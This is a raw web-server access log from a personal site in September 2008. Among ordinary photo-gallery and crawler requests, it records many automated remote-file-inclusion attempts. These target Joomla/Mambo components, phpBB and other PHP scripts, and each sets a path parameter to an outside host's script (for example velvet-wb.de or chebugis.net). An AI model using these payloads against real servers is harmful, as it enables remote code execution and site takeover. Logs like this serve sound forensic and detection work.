67.18.151.242 - - [20/Sep/2008:10:11:01 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92711 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [20/Sep/2008:10:11:01 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:11:02 -0700] "GET /logs/access_080714.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:11:03 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92736 "-" "libwww-perl/5.802" "www.dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:11:04 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:11:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-100_0.jpg HTTP/1.1" 200 441605 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:11:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-130_1.jpg HTTP/1.1" 200 382763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:11:32 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:11:34 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 92271 "-" "libwww-perl/5.76" "www.dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:11:35 -0700] "GET /logs/access_080628.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:11:35 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:11:38 -0700] "GET /logs/access_080824.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:11:39 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92686 "-" "libwww-perl/5.803" "www.dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:11:40 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:11:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-156_0.jpg HTTP/1.1" 200 336367 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:11:43 -0700] "GET /logs/access_080522.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:11:47 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:11:50 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [20/Sep/2008:10:11:52 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [20/Sep/2008:10:11:53 -0700] "GET /logs/access_080208.log/index.php?uid=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [20/Sep/2008:10:11:55 -0700] "GET /index.php?uid=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 200 92270 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:11:55 -0700] "GET /logs/access_080522.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.22.89.194 - - [20/Sep/2008:10:11:55 -0700] "GET /logs/index.php?uid=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:11:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0148.jpg HTTP/1.1" 200 398432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:12:03 -0700] "GET /logs/access_080525.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:12:03 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:12:03 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:12:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-177_0.jpg HTTP/1.1" 200 258120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
67.43.6.114 - - [20/Sep/2008:10:12:19 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://escortreview.com/_notes/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.43.6.114 - - [20/Sep/2008:10:12:19 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://escortreview.com/_notes/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:12:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-097_1.jpg HTTP/1.1" 200 391714 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:12:40 -0700] "GET /logs/access_080522.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:12:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-282.jpg HTTP/1.1" 200 300566 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:12:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-278.jpg HTTP/1.1" 200 369205 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:10:12:58 -0700] "GET /logs/access.log HTTP/1.0" 200 383136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:13:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-063_0.jpg HTTP/1.1" 200 328303 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:13:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-029_1.jpg HTTP/1.1" 200 406191 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:13:28 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:13:31 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92686 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:13:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-065.jpg HTTP/1.1" 200 233408 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:10:13:40 -0700] "GET /bikes/dteel/2008_09_13/?M=D HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:13:51 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:13:51 -0700] "GET /logs/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 65877 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:13:51 -0700] "GET /?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 92250 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:13:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-050_2.jpg HTTP/1.1" 200 434087 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:14:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-041_0.jpg HTTP/1.1" 200 307796 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:14:15 -0700] "GET /logs/access_080219.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:14:17 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92721 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:14:18 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92721 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:14:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-117_0.jpg HTTP/1.1" 200 525046 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:14:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-179.jpg HTTP/1.1" 200 305872 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:10:14:37 -0700] "GET /logs/access_080720.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:14:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-129.jpg HTTP/1.1" 200 379596 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:14:54 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:14:56 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 92615 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.183.215 - - [20/Sep/2008:10:15:03 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ff.laineck.de//components/com_galleria/bo.do.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
61.100.183.215 - - [20/Sep/2008:10:15:03 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ff.laineck.de//components/com_galleria/bo.do.jpg?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:10:15:03 -0700] "GET /logs/access_080826.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:15:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-120.jpg HTTP/1.1" 200 636941 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.88.18.196 - - [20/Sep/2008:10:15:06 -0700] "GET /logs/access_080524.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.232.89.11 - - [20/Sep/2008:10:15:06 -0700] "GET /logs/subscp.php?phpbb_root_path=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.232.89.11 - - [20/Sep/2008:10:15:07 -0700] "GET /subscp.php?phpbb_root_path=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:15:19 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0145.jpg HTTP/1.1" 200 330556 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:15:23 -0700] "GET /logs/access_080830.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:15:23 -0700] "GET /logs/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 65877 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:15:24 -0700] "GET /?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 92266 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:15:29 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:15:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-097_0.jpg HTTP/1.1" 200 383703 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:15:46 -0700] "GET /logs/access_080902.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:15:57 -0700] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:15:57 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:15:57 -0700] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:16:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-057_0.jpg HTTP/1.1" 200 562232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:16:02 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92686 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:16:15 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:16:19 -0700] "GET /logs/access_080304.log//configuration.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:16:20 -0700] "GET //configuration.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:16:20 -0700] "GET /logs//configuration.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [20/Sep/2008:10:16:27 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92700 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:16:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002_2.jpg HTTP/1.1" 200 430825 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:16:39 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:16:39 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92720 "-" "libwww-perl/5.802" "www.dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:16:40 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92721 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:16:41 -0700] "GET /index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 92321 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:16:42 -0700] "GET /index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 92305 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:16:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-122_0.jpg HTTP/1.1" 200 554335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.253.223.90 - - [20/Sep/2008:10:16:47 -0700] "GET /logs/access_071228.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:16:49 -0700] "GET /logs/access_080412.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:16:51 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92750 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:16:52 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:16:54 -0700] "GET /logs/access_080515.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.217.156.81 - - [20/Sep/2008:10:16:54 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [20/Sep/2008:10:16:54 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [20/Sep/2008:10:16:55 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:16:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0083.jpg HTTP/1.1" 200 378221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:16:59 -0700] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:16:59 -0700] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:17:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-113_0.jpg HTTP/1.1" 200 493196 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:17:17 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92766 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:17:20 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:17:21 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92705 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:17:24 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0020.jpg HTTP/1.1" 200 361318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:17:32 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
